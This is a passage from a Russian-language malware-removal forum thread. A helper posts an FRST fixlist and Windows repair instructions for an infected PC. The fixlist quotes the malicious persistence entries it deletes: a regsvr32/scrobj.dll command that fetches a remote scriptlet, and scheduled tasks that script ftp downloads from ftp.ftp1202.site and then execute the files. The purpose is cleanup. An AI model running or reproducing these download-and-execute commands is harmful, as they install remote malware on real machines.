Выделите и скопируйте в буфер обмена следующий код:[CODE]Start::
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
HKLM\ DisallowedCertificates: 1990649205B55EAB5D692E9EDB1BE0DDD3B037DE (U)
HKLM\ DisallowedCertificates: 3AD010247A8F1E991F8DDE5D47989CB5202E5614 (U)
HKLM\ DisallowedCertificates: 6A2C691767C2F1999B8C020CBAB44756A99A0C41 (U)
HKLM\ DisallowedCertificates: 6B6FA65B1BDC2A0F3A7E66B590F93297B8EB56B9 (U)
HKLM\ DisallowedCertificates: 8835437D387BBB1B58FF5A0FF8D003D8FE04AED4 (U)
HKLM\ DisallowedCertificates: 9FEB091E053D1C453C789E8E9C446D31CB177ED9 (U)
HKLM\ DisallowedCertificates: C597D4E7FF9CE5BD3EC321C11827FCA9294A6BA1 (U)
HKLM\ DisallowedCertificates: D3FD325D0F2259F693DD789430E3A9430BB59B98 (U)
HKU\S-1-5-21-336028783-3233290375-1713493059-1000\...\Run: [Browser Manager] => C:\Users\User\AppData\Local\Yandex\BrowserManager\MBLauncher.exe [130056 2018-08-16] (YANDEX LLC -> Yandex LLC)
HKU\S-1-5-21-336028783-3233290375-1713493059-1000\...\MountPoints2: {237ebabd-4be2-11e8-9862-bc5ff4d36f82} - K:\AutoRun.exe
HKU\S-1-5-21-336028783-3233290375-1713493059-1000\...\MountPoints2: {237ebabf-4be2-11e8-9862-bc5ff4d36f82} - K:\AutoRun.exe
HKU\S-1-5-21-336028783-3233290375-1713493059-1000\...\MountPoints2: {bfa14c95-825c-11e6-a0a3-bc5ff4d36f82} - K:\setup.exe
HKU\S-1-5-21-336028783-3233290375-1713493059-1000\...\MountPoints2: {cec4dfa5-6333-11e9-9d57-bc5ff4d36f82} - E:\HiSuiteDownLoader.exe
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{104AA62D-D285-4BF9-87ED-CC68F20CDD0F}] -> C:\Program Files (x86)\Amazon\Amazon Assistant\AmazonAssistantTaskbar.exe /pin:
HKLM\Software\...\Authentication\Credential Providers: [{B7724AE5-1135-4889-8A5F-CA98BE6CA1ED}] -> C:\Program Files\McAfee\TrueKey\McAfee.TrueKey.CredentialProvider.dll
Lsa: [Notification Packages] scecli C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter "C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter" "C:\Program Files\McAfee\TrueKey\McAfeeTrueKeyPasswordFilter"
Task: {0DF439B1-1377-4D5F-9B1B-A1D4ED3C7AD8} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {1FA2B18F-2A07-4556-B815-6CCE4F14943F} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
Task: {71FE4996-54D4-401A-B9D7-9CF45855DEB2} - System32\Tasks\oka => cmd /c start c:\windows\inf\aspnet\lsma12.exe
Task: {7E9E2E83-506B-43FD-9531-FE544F251AD2} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {A543F880-A2C8-40B5-9823-AA507061F936} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {AF828AD3-B91B-42FE-9D1B-93CB681242E5} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
BHO: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\McAfee\TrueKey\MSIE\truekey_ie64.dll => No File
BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\McAfee\TrueKey\MSIE\truekey_ie.dll => No File
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\ssv.dll => No File
Toolbar: HKLM - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\McAfee\TrueKey\MSIE\truekey_ie64.dll No File
Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\McAfee\TrueKey\MSIE\truekey_ie.dll No File
Toolbar: HKU\S-1-5-21-336028783-3233290375-1713493059-1000 -> True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\McAfee\TrueKey\MSIE\truekey_ie64.dll No File
FF Plugin-x32: @java.com/DTPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\dtplugin\npDeployJava1.dll [No File]
FF Plugin-x32: @java.com/JavaPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\plugin2\npjp2.dll [No File]
S4 TrueKey; "C:\Program Files\McAfee\TrueKey\McAfee.TrueKey.Service.exe" [X]
S4 TrueKeyScheduler; "C:\Program Files\McAfee\TrueKey\McTkSchedulerService.exe" [X]
S4 TrueKeyServiceHelper; "C:\Program Files\McAfee\TrueKey\McAfee.TrueKey.ServiceHelper.exe" [X]
S2 aow_drv; \??\G:\Games\PUBG\TxGameAssistant\UI\aow_drv_x64.sys [X]
2020-04-06 00:19 - 2020-04-06 00:19 - 000000000 _____ C:\Windows\system32\Tmp5466.tmp
2020-04-05 21:09 - 2020-04-05 21:09 - 000000000 _____ C:\Windows\system32\Tmp6E7A.tmp
2020-04-05 21:04 - 2020-04-05 21:04 - 000000000 _____ C:\Windows\system32\Tmp445F.tmp
2020-04-05 21:00 - 2020-04-05 21:00 - 000000000 _____ C:\Windows\system32\Tmp581D.tmp
2020-04-05 21:00 - 2020-04-05 21:00 - 000000000 _____ C:\Windows\system32\Tmp5781.tmp
2020-04-05 20:55 - 2020-04-05 20:55 - 000000000 _____ C:\Windows\system32\Tmp533D.tmp
2020-04-05 20:55 - 2020-04-05 20:55 - 000000000 _____ C:\Windows\system32\Tmp4845.tmp
2020-04-05 20:52 - 2020-04-05 20:52 - 000000000 _____ C:\Windows\system32\Tmp48B2.tmp
2020-04-05 20:33 - 2020-04-05 20:33 - 000000000 _____ C:\Windows\system32\Tmp515A.tmp
2020-04-05 20:33 - 2020-04-05 20:33 - 000000000 _____ C:\Windows\system32\Tmp4539.tmp
2020-04-05 20:29 - 2020-04-05 20:29 - 000000000 _____ C:\Windows\system32\Tmp4BBE.tmp
2020-04-05 19:17 - 2020-04-05 19:17 - 000000000 _____ C:\Windows\system32\Tmp6872.tmp
2020-04-05 19:17 - 2020-04-05 19:17 - 000000000 _____ C:\Windows\system32\Tmp5955.tmp
2020-04-05 19:08 - 2020-04-05 19:08 - 000000000 _____ C:\Windows\system32\Tmp6AA4.tmp
2020-04-05 16:00 - 2020-04-05 16:00 - 000000000 _____ C:\Windows\system32\TmpF823.tmp
2020-04-05 16:00 - 2020-04-05 16:00 - 000000000 _____ C:\Windows\system32\TmpECFC.tmp
2020-04-05 15:56 - 2020-04-05 15:56 - 000000000 _____ C:\Windows\system32\TmpEE92.tmp
2020-04-05 15:06 - 2020-04-05 15:06 - 000000000 _____ C:\Windows\system32\Tmp4864.tmp
2020-04-05 15:06 - 2020-04-05 15:06 - 000000000 _____ C:\Windows\system32\Tmp45C6.tmp
2020-04-05 13:01 - 2020-04-05 13:01 - 000000000 _____ C:\Windows\system32\Tmp5179.tmp
2020-04-05 13:01 - 2020-04-05 13:01 - 000000000 _____ C:\Windows\system32\Tmp451A.tmp
2020-04-05 12:57 - 2020-04-05 12:57 - 000002355 _____ C:\Users\User\Desktop\AdwCleaner.rar
2020-04-05 12:56 - 2020-04-05 12:56 - 000000000 _____ C:\Windows\system32\Tmp4402.tmp
2020-04-05 12:55 - 2020-04-05 12:55 - 000000290 _____ C:\Windows\Tasks\AdwCleaner_onReboot.job
2020-04-05 12:52 - 2020-04-05 12:55 - 000000000 ____D C:\AdwCleaner
2020-04-05 12:24 - 2020-04-05 12:24 - 000000000 _____ C:\Windows\system32\Tmp59D3.tmp
2020-04-05 12:10 - 2020-04-05 12:10 - 000000000 _____ C:\Windows\system32\Tmp3938.tmp
2020-04-05 12:01 - 2020-04-05 12:01 - 000000000 _____ C:\Windows\system32\Tmp46EE.tmp
2020-04-05 12:01 - 2020-04-05 12:01 - 000000000 _____ C:\Windows\system32\Tmp448E.tmp
2020-04-05 11:41 - 2020-04-05 11:41 - 000000000 _____ C:\Windows\system32\Tmp47F7.tmp
2020-04-05 11:41 - 2020-04-05 11:41 - 000000000 _____ C:\Windows\system32\Tmp44FB.tmp
2020-04-05 11:37 - 2020-04-05 11:37 - 000000000 _____ C:\Windows\system32\Tmp402A.tmp
2020-04-05 11:37 - 2020-04-05 11:37 - 000000000 _____ C:\Windows\system32\Tmp3F8E.tmp
2020-04-05 10:03 - 2020-04-05 10:03 - 000000000 _____ C:\Windows\system32\Tmp3BF6.tmp
2020-04-05 09:51 - 2020-04-05 09:51 - 000000000 _____ C:\Windows\system32\Tmp5F2F.tmp
2020-04-05 09:51 - 2020-04-05 09:51 - 000000000 _____ C:\Windows\system32\Tmp4874.tmp
2020-04-05 09:43 - 2020-04-05 09:43 - 000000000 _____ C:\Windows\system32\Tmp3706.tmp
2020-04-05 09:43 - 2020-04-05 09:43 - 000000000 _____ C:\Windows\system32\Tmp364B.tmp
2020-04-05 09:31 - 2020-04-05 09:31 - 000000000 _____ C:\Windows\system32\Tmp5659.tmp
2020-04-05 09:23 - 2020-04-05 09:23 - 000000000 _____ C:\Windows\system32\Tmp3A22.tmp
2020-04-05 07:51 - 2020-04-05 07:51 - 000000000 _____ C:\Windows\system32\Tmp4401.tmp
2020-04-05 07:51 - 2020-04-05 07:51 - 000000000 _____ C:\Windows\system32\Tmp4365.tmp
2020-04-05 00:24 - 2020-04-05 00:24 - 000000000 _____ C:\Windows\system32\Tmp42E8.tmp
2020-04-05 00:24 - 2020-04-05 00:24 - 000000000 _____ C:\Windows\system32\Tmp3ED3.tmp
2020-04-05 00:17 - 2020-04-06 00:19 - 000000081 _____ C:\Windows\system32\s
2020-04-05 00:17 - 2020-04-06 00:19 - 000000079 _____ C:\Windows\system32\ps
2020-04-05 00:17 - 2020-04-06 00:19 - 000000077 _____ C:\Windows\system32\p
2020-04-05 00:17 - 2020-04-05 00:17 - 000000000 _____ C:\Windows\system32\Tmp4EAB.tmp
2020-04-04 18:53 - 2020-04-04 18:53 - 000000000 _____ C:\Windows\system32\Tmp6DBF.tmp
2020-04-04 18:09 - 2020-04-04 18:09 - 000000000 _____ C:\Windows\system32\Tmp58E8.tmp
2020-04-04 18:09 - 2020-04-04 18:09 - 000000000 _____ C:\Windows\system32\Tmp5782.tmp
2020-04-04 17:35 - 2020-04-05 19:40 - 000000000 ____D C:\KVRT_Data
2020-04-04 16:42 - 2020-04-04 16:42 - 000634189 _____ C:\Users\User\Desktop\quarantine.zip
2020-04-04 12:11 - 2020-04-04 12:11 - 000000000 _____ C:\Windows\system32\TmpAB7A.tmp
2020-04-04 12:11 - 2020-04-04 12:11 - 000000000 _____ C:\Windows\system32\Tmp9F2C.tmp
2017-12-29 22:36 - 2017-10-30 22:36 - 000000032 ____R () C:\ProgramData\hash.dat
017-09-26 14:50 - 2017-09-26 14:50 - 000000001 _RHOT () C:\Program Files (x86)\Amazon
2017-12-02 19:14 - 2012-09-01 19:03 - 000000144 _____ () C:\Users\User\AppData\Roaming\ACEConfigCache2.lst
2017-09-26 14:50 - 2017-09-26 14:50 - 000000001 _RHOT () C:\Users\User\AppData\Roaming\BrowserModule
2017-09-26 14:50 - 2017-09-26 14:50 - 000000001 _RHOT () C:\Users\User\AppData\Roaming\DriverAgentPlus
2017-09-26 14:50 C:\ProgramData\UBar
Shortcut: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wargaming.net\Total War Arena\Удалить Total War Arena.lnk -> G:\Games\Total_War_Arena\wgc_api.exe (No File) <==== Cyrillic
Shortcut: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VkontakteDJ\Удалить программу.lnk -> C:\ProgramData\VkontakteDJ\uninstall.exe (No File) <==== Cyrillic
Shortcut: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Counter-Strike Global Offensive\Деинсталлировать.lnk -> G:\CS\Counter-Strike Global Offensive\Uninstall.exe (No File) <==== Cyrillic
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [658]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [434]
AlternateDataStreams: C:\Users\User\Application Data:77a575add9465d78c606d381e5f202fb [394]
MSCONFIG\Services: TrueKey => 2
MSCONFIG\Services: TrueKeyScheduler => 2
MSCONFIG\Services: TrueKeyServiceHelper => 2
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: USB Antivirus => C:\Program Files (x86)\USB Disk Security\USBGuard.exe
MSCONFIG\startupreg: USB Security => C:\Users\User\AppData\Roaming\Zbshareware Lab\USBGuard.exe
FirewallRules: [{AD9740CC-B546-47FA-B708-89B2F60A1390}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe No File
FirewallRules: [{3EACB996-3836-4E89-AED2-CD8D757769F2}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe No File
FirewallRules: [{1A98BDB5-515F-4DDD-8236-55D98B519D58}] => (Allow) C:\Users\User\AppData\Local\GameCenter\GameCenter.exe No File
FirewallRules: [{BC1BDBF8-FA30-457A-B11A-C98D7E575490}] => (Allow) C:\Users\User\AppData\Local\GameCenter\GameCenter.exe No File
FirewallRules: [{DC0AD15D-CB07-4BDA-ACCA-97930542E926}] => (Block) LPort=445
FirewallRules: [{82EED667-D3F4-4141-9DD5-67E846546D48}] => (Block) LPort=139
Reboot:
End::[/CODE]Запустите FRST.EXE/FRST64.EXE, нажмите один раз [B]Fix[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Скачайте [URL="http://www.tweaking.com/files/setups/tweaking.com_windows_repair_aio.zip"]Windows Repair (All In One)[/URL], распакуйте, запустите, "Jump To Repairs", "Open Repairs", отметьте пункты:
"Remove Temp Files"
"Repair Windows Updates"
"Restore Important Windows Services"
"Set Windows Services To Default Startup"
"Repair MSI (Windows Installer"
и нажмите "[B]Start Repairs[/B]".
И пробуйте устанавливать пакет обновлений, как в сообщении #13 писал.